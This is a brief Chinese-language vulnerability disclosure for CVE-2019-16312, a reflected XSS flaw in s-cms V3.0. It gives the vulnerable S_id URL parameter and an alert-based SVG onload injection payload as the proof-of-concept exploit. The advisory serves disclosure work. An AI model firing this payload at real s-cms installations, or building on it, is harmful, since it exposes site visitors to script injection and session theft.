CVE中文申请站

一、漏洞摘要

漏洞名称: s-cms V3.0全版本通杀XSS漏洞
上报日期: 2019-09-09
漏洞发现者: 小陈(758682207@qq.com)
产品首页: https://www.s-cms.cn/
软件链接: https://www.s-cms.cn/download.html
版本: V3.0
CVE编号: CVE-2019-16312


二、漏洞概述

漏洞url:http://127.0.0.1/s-cms/?type=text&S_id=1"><svg/onload=alert(/1/)>

1.png

测试发现,六套系统均存在XSS漏洞

Url+/?type=text&S_id=1"><svg/onload=alert(/1/)>
2.png


三、利用代码

exp代码如下:

"><svg/onload=alert(/1/)>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/320/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16312
exploit-db:发布中

标签: XSS, s-cms